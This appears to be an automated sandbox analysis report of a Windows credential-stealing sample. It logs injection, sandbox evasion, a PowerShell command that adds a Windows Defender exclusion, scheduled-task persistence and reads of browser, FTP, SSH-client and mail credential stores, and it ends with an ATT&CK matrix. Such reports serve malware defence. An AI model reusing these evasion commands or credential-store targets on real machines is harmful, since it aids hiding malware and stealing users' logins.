                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMemory allocated: 9B80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMemory allocated: 9D80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMemory allocated: AD80000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeMemory allocated: B40000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeMemory allocated: 2860000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeMemory allocated: CD0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeMemory allocated: 87B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeMemory allocated: 8260000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeMemory allocated: 97B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeMemory allocated: A7B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7881Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1691Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exe TID: 2680Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6664Thread sleep time: -9223372036854770s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exe TID: 3720Thread sleep time: -180000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe TID: 6640Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeThread delayed: delay time: 60000Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: FVR-N2411-07396.exe, 00000000.00000002.2072739008.00000000089E0000.00000004.08000000.00040000.00000000.sdmp, FVR-N2411-07396.exe, 00000000.00000002.2053905676.0000000003BC2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEMu6JdlAP
                      Source: FVR-N2411-07396.exe, 00000007.00000002.3255881950.0000000000CC8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: ZeJFfrYmOnJKS.exe, 0000000C.00000002.2128021520.0000000001498000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll$
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 12_2_0040317B mov eax, dword ptr fs:[00000030h]12_2_0040317B
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: 12_2_00402B7C GetProcessHeap,HeapAlloc,12_2_00402B7C
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess token adjusted: DebugJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMemory allocated: page read and write | page guardJump to behavior

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeMemory written: C:\Users\user\Desktop\FVR-N2411-07396.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeMemory written: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe base: 400000 value starts with: 4D5AJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpA6B9.tmp"Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeProcess created: C:\Users\user\Desktop\FVR-N2411-07396.exe "C:\Users\user\Desktop\FVR-N2411-07396.exe"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ZeJFfrYmOnJKS" /XML "C:\Users\user\AppData\Local\Temp\tmpC1C3.tmp"Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeProcess created: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe "C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe"Jump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeQueries volume information: C:\Users\user\Desktop\FVR-N2411-07396.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeQueries volume information: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exe VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FVR-N2411-07396.exe PID: 2668, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 1436, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: ZeJFfrYmOnJKS.exe PID: 6400, type: MEMORYSTR
                      Source: Yara matchFile source: dump.pcap, type: PCAP
                      Source: Yara matchFile source: 00000007.00000002.3255881950.0000000000CC8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: FVR-N2411-07396.exe PID: 1496, type: MEMORYSTR
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.5540000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a6ddb0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.ZeJFfrYmOnJKS.exe.28dde98.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a6ddb0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a65d98.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2071531160.0000000005540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2053219827.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2130538149.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                      Source: C:\Users\user\Desktop\FVR-N2411-07396.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: PopPassword12_2_0040D069
                      Source: C:\Users\user\AppData\Roaming\ZeJFfrYmOnJKS.exeCode function: SmtpPassword12_2_0040D069
                      Source: Yara matchFile source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.ZeJFfrYmOnJKS.exe.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.3a024c8.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.3ba89f8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2053905676.00000000039E9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2127380939.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2130538149.00000000028A5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2053905676.0000000003A22000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2053219827.00000000029E1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                      Remote Access Functionality

                      barindex
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.5540000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.5540000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a6ddb0.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a7de7c.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.ZeJFfrYmOnJKS.exe.28dde98.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a6ddb0.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 0.2.FVR-N2411-07396.exe.2a65d98.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000000.00000002.2071531160.0000000005540000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000000.00000002.2053219827.0000000002A61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.2130538149.00000000028CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Windows Management Instrumentation
                      1
                      DLL Side-Loading
                      1
                      DLL Side-Loading
                      11
                      Disable or Modify Tools
                      2
                      OS Credential Dumping
                      1
                      File and Directory Discovery
                      Remote Services11
                      Archive Collected Data
                      3
                      Ingress Tool Transfer
                      Exfiltration Over Other Network MediumAbuse Accessibility Features
                      CredentialsDomainsDefault Accounts1
                      Scheduled Task/Job
                      1
                      Scheduled Task/Job
                      111
                      Process Injection
                      11
                      Deobfuscate/Decode Files or Information
                      2
                      Credentials in Registry
                      23
                      System Information Discovery
                      Remote Desktop Protocol2
                      Data from Local System
                      1
                      Encrypted Channel
                      Exfiltration Over BluetoothNetwork Denial of Service
                      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                      Scheduled Task/Job
                      4
                      Obfuscated Files or Information
                      Security Account Manager111
                      Security Software Discovery
                      SMB/Windows Admin Shares1
                      Email Collection
                      2
                      Non-Application Layer Protocol
                      Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook22
                      Software Packing
                      NTDS1
                      Process Discovery
                      Distributed Component Object ModelInput Capture112
                      Application Layer Protocol
                      Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                      Timestomp
                      LSA Secrets31
                      Virtualization/Sandbox Evasion
                      SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      DLL Side-Loading
                      Cached Domain Credentials1
                      Application Window Discovery
                      VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Masquerading
                      DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job31
                      Virtualization/Sandbox Evasion
                      Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt111
                      Process Injection
                      /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 1564533 Sample: FVR-N2411-07396.exe Startdate: 28/11/2024 Architecture: WINDOWS Score: 100 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Malicious sample detected (through community Yara rule) 2->47 49 12 other signatures 2->49 7 FVR-N2411-07396.exe 7 2->7         started        11 ZeJFfrYmOnJKS.exe 5 2->11         started        process3 file4 33 C:\Users\user\AppData\...\ZeJFfrYmOnJKS.exe, PE32 7->33 dropped 35 C:\...\ZeJFfrYmOnJKS.exe:Zone.Identifier, ASCII 7->35 dropped 37 C:\Users\user\AppData\Local\...\tmpA6B9.tmp, XML 7->37 dropped 39 C:\Users\user\...\FVR-N2411-07396.exe.log, ASCII 7->39 dropped 51 Uses schtasks.exe or at.exe to add and modify task schedules 7->51 53 Adds a directory exclusion to Windows Defender 7->53 55 Injects a PE file into a foreign processes 7->55 13 FVR-N2411-07396.exe 156 7->13         started        17 powershell.exe 23 7->17         started        19 schtasks.exe 1 7->19         started        57 Multi AV Scanner detection for dropped file 11->57 59 Tries to steal Mail credentials (via file registry) 11->59 61 Machine Learning detection for dropped file 11->61 21 schtasks.exe 1 11->21         started        23 ZeJFfrYmOnJKS.exe 11->23         started        signatures5 process6 dnsIp7 41 94.156.177.41, 49708, 49709, 49711 NET1-ASBG Bulgaria 13->41 63 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->63 65 Tries to steal Mail credentials (via file / registry access) 13->65 67 Tries to harvest and steal ftp login credentials 13->67 69 Tries to harvest and steal browser information (history, passwords, etc) 13->69 71 Loading BitLocker PowerShell Module 17->71 25 WmiPrvSE.exe 17->25         started        27 conhost.exe 17->27         started        29 conhost.exe 19->29         started        31 